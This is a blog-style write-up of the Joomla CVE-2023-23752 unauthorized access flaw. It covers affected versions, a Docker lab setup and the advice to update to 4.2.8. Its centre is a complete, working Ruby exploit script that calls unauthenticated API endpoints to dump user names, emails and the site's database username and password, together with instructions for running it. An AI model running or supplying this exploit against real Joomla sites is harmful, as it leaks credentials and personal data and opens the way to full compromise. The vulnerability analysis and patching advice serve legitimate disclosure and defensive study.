Navigating the Joomla Unauthorized Access Vulnerability – CVE-2023-23752

Joomla, a globally recognized content management system, has recently encountered a significant security issue.

Developed using PHP language and MySQL database, Joomla is adaptable across multiple platforms including Linux, Windows, and MacOSX.

However, even such robust systems are not immune to vulnerabilities, as evidenced by the recent discovery of an unauthorized access vulnerability (CVE-2023-23752).

Despite its advanced design and widespread usage, it became apparent that Joomla was susceptible to a significant security flaw that could potentially jeopardize sensitive information.

In the forthcoming sections, we will explore this unauthorized access vulnerability in greater detail, delve into its potential implications, and discuss the necessary steps Joomla has taken to mitigate this issue.

Understanding the Implications of CVE-2023-23752

This security flaw was discovered and reported by a researcher from NSFOCUS Tianji Lab, leading to Joomla releasing an official notice to address this issue. The vulnerability lies in Joomla’s access control for its Web service endpoints.

This flaw allows unauthenticated attackers to gain access to the RestAPI interface and retrieve Joomla-related configuration information.

The attackers can exploit this vulnerability by creating specially designed requests, which could result in the exposure of sensitive information.

To put it simply, the attackers have found a way to bypass the normal authentication process and directly access the data they are not supposed to see.

At this point, the Proof of Concept (PoC) along with the details of the vulnerability have been publicly disclosed. This means that potential attackers now have a roadmap to exploit this vulnerability, making it even more critical for affected users to take immediate protective actions.

Scope of Impact and Affected Versions

The scope of the impact of this vulnerability is substantial, affecting a range of Joomla versions. Specifically, Joomla versions from 4.0.0 through to 4.2.7 are vulnerable to this unauthorized access flaw. This means that any website or platform running these versions of Joomla could potentially be exposed to unauthenticated attackers.

However, it’s important to note that versions of Joomla from 4.2.8 onwards are not affected by this vulnerability. Users operating on these later versions can rest assured that their platforms are safe from this particular security flaw.

Nevertheless, it is always crucial to regularly update your software to the latest version to ensure maximum protection against potential vulnerabilities.

Proof-of-Concept (PoC)

The recent disclosure of a significant security vulnerability, CVE-2023-23752, affecting Joomla versions 4.0.0 to 4.2.7 has raised many eyebrows in the digital community.

This guide will walk you through the process of exploiting this security flaw for research purposes, using an open-source tool available on GitHub.

exploit.rb:

#!/usr/bin/env ruby

# Exploit
## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752

# Vulnerability
## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab
## Date: 2023-02-24
## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/
## Title: Joomla Unauthorized Access
## CVE: CVE-2023-23752
## Patch: Update to >= 4.2.8
## References:
##   - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
##   - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
##   - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
##   - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
##   - https://vulncheck.com/blog/joomla-for-rce
##   - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml

# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'

doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}

  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help

  #{Paint['Parameters:', :red]}
    <url>       Root URL (base path) including HTTP scheme, port and root folder

  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen

  #{Paint['Examples:', :red]}
    #{__FILE__} http://127.0.0.1:4242
    #{__FILE__} https://example.org/subdir

  #{Paint['Project:', :red]}
    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT

def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption #{c['dbencryption']}"
end

begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']

  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end

Prerequisites

Before we dive into the exploitation process, there are a few requirements you need to meet:

  • httpx: This is a Ruby HTTP client designed for ease and resilience. It can be installed using the command gem install httpx.
  • docopt.rb: A command-line argument parser that will make creating beautiful command-line interfaces a breeze. Use gem install docopt to add it to your environment.
  • paint: An easy-to-use terminal colorization library. It can be added with gem install paint.

Alternatively, you can install all these libraries at once by using the bundle install command.

Setting Up a Vulnerable Environment

To safely experiment with this exploit, we recommend setting up a controlled environment. One way to do this is by deploying a vulnerable version of Joomla (v4.2.7) using Docker. Here are the steps:

  1. Run the command docker-compose up --build to start the Docker instance.
  2. Open a web browser and navigate to http://127.0.0.1:4242/installation/index.php. You should see the Joomla installation page.
  3. Complete the installation process. When asked for database credentials, use ‘root’ for both username and password. For the host, enter ‘mysql’.

Please note that this setup is not intended for production use due to its inherent vulnerability.

Exploiting the Vulnerability

With the vulnerable environment set up, you can now proceed to exploit the CVE-2023-23752 vulnerability.

The exploit script exploit.rb is designed to interact with the Joomla instance and retrieve sensitive information.

To use the script, run ruby exploit.rb -h for a list of commands. For example, to exploit a local Joomla instance, you would run ruby exploit.rb http://127.0.0.1:4242.

The script will then attempt to bypass the authentication process and retrieve sensitive data including user and database information. Remember, this is for educational purposes only and should not be used maliciously.

By understanding how this exploit works, we can better protect our systems and data from potential security threats. Always ensure your software is updated to the latest version to mitigate such vulnerabilities.

Mitigation

Joomla has been proactive in addressing this issue, providing an update to fix this unauthorized access vulnerability.

Users who utilize Joomla’s platform should ensure they have implemented this update as soon as possible to safeguard their sensitive information from potential attacks.

Conclusion

The reality of our increasingly digital world is that software vulnerabilities like CVE-2023-23752 will continue to emerge.

However, as we’ve seen in this instance, swift detection, transparent reporting, and immediate remediation can significantly curb the potential harm.

The issue with Joomla was handled adeptly, showcasing the importance of robust cybersecurity practices.

For us as users, our most potent safeguard against these threats lies in staying abreast of the latest developments and taking immediate action when necessary.

This includes regular software updates, adhering to recommended security protocols, and maintaining an awareness of the digital landscape.

By doing so, we can ensure our digital environments remain as secure as possible, even in the face of unexpected vulnerabilities.